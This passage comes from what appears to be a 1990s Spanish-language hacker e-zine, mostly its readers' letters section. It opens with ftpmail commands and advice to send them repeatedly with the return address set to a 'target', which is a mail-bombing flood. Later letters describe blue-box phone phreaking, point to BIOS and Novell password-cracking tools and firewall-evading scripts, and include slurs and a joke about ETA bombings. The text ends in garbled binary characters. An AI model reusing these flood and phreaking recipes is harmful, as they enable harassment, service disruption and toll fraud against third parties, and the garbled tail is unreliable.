UUENCODE USER anonymous cd /pub/idgames2/quake2/official/ get q2-309.exe QUIT Mandalo como unas cinco veces con intervalos de 10 minutos cada uno y recuerda cambiar la direccion origen por la de tu objetivo. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Cualquier cracker ahora puede usar telnet para atakar cualquier servidor y cualquier puerto sin temor a ser descubierto. Todo esto gracias a Java: http://www.netobjective.com/java/telnet.html *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Con la utilidad para crear diccionarios de palabras para crackear >passwords he conseguido una buena lista, pero como la utilizo con las >ventanas de password (especialmente la de acceso a la BIOS)? imposible mejor consigue el "bios cracker" haz una busqueda de esa palabra en alguna maquina de busqueda y encontraras el archivo. Quizas ya este en la seccion de software de RareGaZz *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >- En las Nowhere Utilities, con el comando Cipher puedo encriptar > archivos pero despues no se como desencriptarlos, he leido las instrucciones > y dicen que hay que ejecutar el programa de nuevo con la contraseña pero lo > unico que hace es volverlos a encriptar; como hago para desencriptar? Nup! el comando cipher NO ENCRIPTA, CIPHEREA. Codifica un archivo con una clave y los descodifica de la misma manera. Vamos intentalo! cipher 123 archivo.txt (encriptar) cipher 123 archivo.txt (desencriptar) *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Podriais hacer un articulo explicando con ejemplos cada una de las utilidades >de Nowhere Man y sus funciones si no es pedir demasiado? claro que puedo, magnifica idea! *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ En un numero de la revista se pedian canales de IRC de habla hispana, yo he encontrado algunos y espero que a alguien le vengan bien. NOTA: Todos los canales tienen el puerto 6667 irc.arrakis.es irc.lleida.net irc.catalunya.net irc.servicom.es => recomendado irc.encomix.es => recomendado irc.ctv.es irc.jet.es irc.ergos.es irc.i3d.es irc.eui.upv.es irc.mundivia.es irc.ibernet.es irc.lander.es irc.teleline.es irc.ceta.es 194.224.67.3 irc.virtualsw.es irc.amadeus.es irc.ergos.es irc.valnet.es es.undernet.org *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Es patetica vuestra referencia a los HIJOSDEMALAPUTA de ETA en la revista 009. >Por favor, no opineis de lo que no conoceis que la cagais nombre del CHE y la >palabra ZAPATISTAS con la de ETA es denigrar a los dos primeros... QUE >ATREVIDA ES LA IGNORANCIA!!!!!!!!!!! opinar de lo que sabeis (que sabeis >mucho, no de lo que desconoceis. Os suena Miguel Angel blanco???? recibio dos >balas de cal.22 por el simple echo de vivir, sentir y amar. Por lo demas >seguir asi... vuestra revista es muy buena. Un saludo de Asturcon >P.D: si quereis hablar del tema de ETA e informaos de lo que ocurre no teneis >mas que decirlo en vuestra revista. ehhhh... nadie dijo que ETA fuera similar o parecido al Che o a los Zapatistas. Y bueno, que fue lo que dijimos de ETA? " Si ETA dejara de hacer coches bomba, ¿quien se acordaria de ellos? " Es o no verdadero!? *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Queria hacer un comentario sobre una frase que lei en la RaregazZ. >La frase decia algo asi como... > >"Si los de ETA no pusiesen coches bomba, nadie se acordaria de ellos". >No capto el sentido de la frase, es decir, no se si les apoyais o que...:-? > > Solo quiero decir que los de ETA son los peores ¿seres humanos? de >la tierra, y por ello no se merecen ni siquiera ser mencionados en este >fantastico e-zine.... Ya se que en la revista se tratan de temas >anarquicos, pero lo de ETA no puede meterse dentro de esta calificacion. >Son unos terroristas HIJOS DE PUTA, y habria que acabar con todos ellos... >¡VASCOS SI, ETA NO! > > Seguir asi de bien... :-) Hackerz Rulez! La respuesta es la misma que arriba... *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >...otra cosa que queria saber es como se conecta a una bbs ya que soy un >novato en este campo. Usando tu programa de Telnet (si usas windows95 escribe telnet en c:\windows) y selecciona conectar, despues escribe sinet.sinet.com.mx y cuando aparezca Login: escribe BBS despues te das de alta o entras de invitado. Presionando la T(alk) y luego la C(hat) podras platicar con personas de Mexico. En ocasiones por ahi puedes encontrarme con mi Nick. Raretrip *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Aquellos que escriben solicitando la forma de llamar gratis desde telefonos de tarjeta por favor manden email a truco haciendo esa pregunta. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >pero como entrar a esos tipos de servidores.....si cuando me voy a conectar >me da un mensaje: fallo en la conexi=n Esos servidores estan detras de una firewall o barrera de fuego. Existen algunos scripts perl que puedes configurar en tu sistema para poder usar telnet o ftp mas alla de la firewall. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Que tal viejo, oye he leido articulos gavachos acerca del phreacking, y >de hecho ya cuento con varios programas de blue boxing, pero no he >podido hacer ninguna maldita llamada de larga distancia gratis !!!! >Segun esto lo estoy haciendo bien ... checa si mi procedimiento esta >bien : > >1. llamar a un numero 91-800... >2. Cuando haya seqal de respuesta (tono de ocupado, tono de marcando, o >grabacion) > > hago lo siguiente : > (mando tono de 2600 hz) + KP + (91+LADA+Numero) + ST > >ej. de numero: 0164 180945 Estoy utilizando un set de marcado tipo >CCITT 5, ta trate con un set DTMF y tampoco. > >? Que demonios estoy haciendo mal ???????? No estoy seguro de que esa sea la manera para hacer llamadas gratis aqui en Mexico... *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ > Tengo una pequeña pregunta , Como se puede interceptar mails? porque a >mi una persona me los ha estado interceptando Y ME LOS ENVIA DE NUEVO >PERO deformandoS !! YA TENGO SU E-MAIL !!! Obviamente esta persona tiene tu password y te esta jugando una broma pesada. por eso debes escoger passwords seguros y mantenerlo secreto. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >el administrador de una red novell 3.12 se retiro de un momento a otro y no >dejo el password de Supervisor, quisiera saber si existe alguna manera de >pasar dicha seguridad o en todo caso como averiguarlo. Gracias de antemano >por su ayuda. Saludos. Busca en nuestra pagina de software los programas para Novell... *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >1.- ¿ Si yo tengo PGP 5.0 y alguien tiene una version anterior, el me >puede mandar mensajes encriptados y que yo los pueda leer ? Asi es. >2.- ¿ PGP 5.0 puede encriptar archivos y mensajes usando DES ? No. DES ha desaparecido en la version 5.0 de PGP debido a problemas de licencia. >3.- ¿ Se puede extraer la llave secreta del PGP 5.0 ? Si. Abre el PGPKEYS y usa la opcion exportar que aparece cuando presionas el boton derecho del raton. Despues selecciona la opcion importar para añadir las llaves (publica y secreta). *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ > ¿ Y que paso con lo del posible hack a el server de IFE por parte > de RdK , en las pasadas elecciones del jefe de gob. del D.F ? Las computadoras del IFE no estan conectadas a Internet como inicialmente pensaron. Resulto ser un simple servidor para paginas web solamente. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Banda, en el n. 7 pusieron un asertijo sobre un hombre que tenia que pasar >un puente. Una situacion similar, le ocurre a Sancho Panza (escudero del >quijote) en una de sus aventuras. Cervantes resuelve el problema apelando a >la moral y la etica, habiendo dado Sancho un frase tan ingeniosa , y siendo >que hagan lo que hagan, habran sido injustos, deciden perdonarle la vida y >dejarle pasar. (Solucion de Cervantes, no mia) *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >Condorito el personaje proveniente de pelotillehue, creado por Pepo. >Sera la mascota oficial del windows 98 en America; si, microsoft compro >los derechos de este personaje para incorporarlo en su nuevo sistema >operativo. El monopolio mas grande de USA invade America... y se sale con la suya. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ >1- Publiquen de cuando en cuando programas completos (los fuentes por >supuesto) de algunos jueguitos, aunque sean los mas mamilas que existan >PacMan, Tetris y mamaditas de esas, a los que estudiamos nos gustan esas >mamaditas. Algun programador interesado en compartir codigo fuente con los lectores? si pudiera añadir breves comentarios al codigo seria fenomenal! *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ CARTA DEL JEFE INDIO ¿Como se puede comprar o vender el firmamento, ni aun el calor de la tierra?. Dicha idea nos es desconocida. Si no somos dueños de la frescura del aire ni del fulgor de las aguas ¿Como podrian ustedes comprarlos? Cada parcela de esta tierra es sagrada para mi pueblo. Cada brillante mata de pino, cada grano de arena de las playas, cada gota de rocio en los oscuros bosques, cada altozano y hasta el sonido de cada insecto es sagrado a la memoria y al pasado de mi pueblo. La savia que circula por las venas de los robles lleva consigo las memorias de los pieles rojas. Los muertos del hombre blanco olvidan su pais de origen cuando emprenden sus paseos por las estrellas; en cambio, nuestros muertos nunca pueden olvidar esa bondadosa tierra, puesto que es la madre de los pieles rojas. Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las flores perfumadas son nuestras hermanas; el venado, el caballo, la gran guila; estos son nuestros hermanos. Las escarpadas peñas, los humedos prados, el calor del cuerpo del caballo y el hombre, todos pertenecemos a la misma familia. Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje de que quiere comprar nuestras tierras dice que nos reservar un lugar en el que podamos vivir confortablemente entre nosotros. El se convertir en nuestro padre y nosotros en sus hijos. Por ello consideramos su oferta de comprar nuestras tierras. Ello no es facil, ya que esta tierra es sagrada para nosotros. El agua cristalina que corre por los rios y arroyuelos no es solamente agua, sino, tambien, representa la sangre de nuestros antepasados. Si le vendemos nuestra tierra deben recordar que es sagrada y a la vez deben enseñar a sus hijos que es sagrada y cada reflejo fantasmagorico en las claras aguas de los lagos cuenta los sucesos y memorias de las vidas de nuestras gentes. El murmullo del agua es la voz del padre de mi padre. Los rios son nuestros hermanos y sacian nuestra sed; son portadores de nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras tierras, ustedes deben recordar y enseñarles a sus hijos que los rios son nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos con la misma dulzura con la que se trata a un hermano. Sabemos que el hombre blanco no comprende nuestro modo de vida. El no sabe distinguir entre un pedazo de tierra y otro, ya que es un extraño que llega de noche y toma de la tierra lo que necesita. La tierra no es su hermana, sino su enemiga, y una vez conquistada sigue su camino, dejando atras la tumba de sus padres sin importarle. Le secuestra la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus padres como el patrimonio de sus hijos son olvidados. Trata a su madre, la tierra, y a su hermano, el firmamento, como objetos que se compran, se explotan y se venden como ovejas o piedras de colores. Su apetito devorar la tierra, dejando atras solo un desierto. No se, pero nuestro modo de vida es diferente al de ustedes. La sola visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por que el piel roja es un salvaje y no comprende nada. No existe un lugar tranquilo en las ciudades del hombre blanco, ni hay sitio donde escuchar como se abren las hojas de los arboles en primavera o como aletean los insectos. Pero quiza tambien esto debe ser porque soy un salvaje que no comprende nada. El ruido solo parece insultar nuestros oidos. Y despues de todo, ¿para que sirve la vida si el hombre no puede escuchar el grito solitario del chotacabras ni las discusiones nocturnas de las ranas al borde de un estanque?. Soy un piel roja y nada entiendo. Nosotros preferimos el suave susurro del viento sobre la superficie de un estanque, asi como el olor de ese mismo viento purificado por la lluvia del mediodia o perfumado con aromas de pinos. El aire tiene un valor inestimable para el piel roja, ya que todos los seres comparten un mismo aliento, la bestia, el arbol, el hombre, todos respiramos el mismo aire. El hombre blanco no parece consciente del aire que respira; como un moribundo que agoniza durante muchos dias es insensible al olor. Pero si les vendemos nuestras tierras, deben recordar que el aire nos es inestimable, que el aire comparte su espiritu con la vida que sostiene. El viento que dio a nuestros abuelos el primer soplo de vida tambien recibe sus ultimos suspiros. Y si les vendemos nuestras tierras, ustedes deben conservarlas como cosa aparte y sagrada, como un lugar donde hasta el hombre blanco pueda saborear el viento perfumado por las flores de las praderas. Por ello, consideramos su oferta de comprar nuestras tierras y si decidimos aceptarla yo pondre una condicion: el hombre blanco debe tratar a los animales de esta tierra como a sus hermanos. Soy un salvaje y no comprendo otro modo de vida. He visto a miles de bufalos pudrirse en las praderas, muertos a tiros por el hombre blanco desde un tren en marcha. Soy un salvaje y no comprendo como una maquina humeante puede importar mas que el bufalo, al que nosotros solo matamos para sobrevivir ¿Que seria del hombre sin los animales? Si todos fueran exterminados, el hombre moriria de una gran soledad espiritual; porque lo que suceda a los animales tambien le sucedera al hombre, todo va enlazado. Deben enseñarles a sus hijos que el suelo que pisan son las cenizas de nuestros abuelos.Inculquen a sus hijos que la tierra esta enriquecida con las vidas de nuestros semejantes a fin que sepan respetarla. Enseñen a sus hijos que nosotros hemos enseñado a los nuestros que la tierra es nuestra madre; y que todo lo que le ocurra a la tierra le ocurrira a los hijos de la tierra. Si los hombres escupen en el suelo, se escupen a si mismos. Esto sabemos: la tierra no pertenece al hombre; el hombre pertenece a la tierra. Esto sabemos: todo va enlazado, como la sangre que une una familia. Todo va enlazado. El hombre no tejio la trama de la vida; el solo es un hijo. Lo que hace con la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo Dios pasea y habla con el de amigo a amigo, queda exento del destino comun. Despues de todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que quiza el hombre blanco descubra algun dia: nuestro Dios es el mismo Dios. Ustedes pueden pensar ahora que El les pertenece, lo mismo que desean que nuestras tierras les pertenezcan, pero no es asi. El es el Dios de los hombres y su compasion se comparte por igual entre el piel roja y el hombre blanco. Esta tierra tiene un valor inestimable para El, y si se daña se provocaria la ira del Creador. Tambien los blancos se extinguiran, quiza antes que las demas tribus. Contaminan sus lechos y una noche pereceran ahogados en sus propios residuos. Pero ustedes caminaran hacia su destruccion rodeados de gloria, inspirados por la fuerza de Dios que os trajo a esta tierra y que, por algun designio especial, les dio dominio sobre ella y sobre el piel roja. Ese destino es un misterio para nosotros, pues no entendemos por que se exterminan los bufalos, se doman los caballos salvajes, se saturan los rincones secretos de los bosques con el aliento de tantos hombres y se atiborra el paisaje de las exuberantes colinas con cables parlantes. ¿Donde esta el matorral? Destruido. ¿Donde esta el aguila? Desaparecio.Termina la vida y empieza la supervivencia. "Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas ortograficas" Colaboracion por Pata. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ Lamento lo que esta pasando en Geocities, pero ya sabeis que los hermanos del norte (el hermano Cain...si EEUU) no desean el progreso intelectual del resto del mundo, porque ellos son mongolicos y se creen los dueños del intelecto. Pero no desmayeis. El mundo H/C/P/V/A esta con vosotros. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ â Rfhëg{3z ß ò¬╛e{H10 èG▌X d┐>esd+¢î÷GWé~ñë┐1ⁿTrfNèò#Sicanl*$ ┘ M╬SÄî Ñ8 rΣgⁿ8z@DgFπ$T.╦|M à-ⁿ E╦è3εÑ&ε√è⌡@OM $ÜzeçWï ╫ÆBⁿXÉ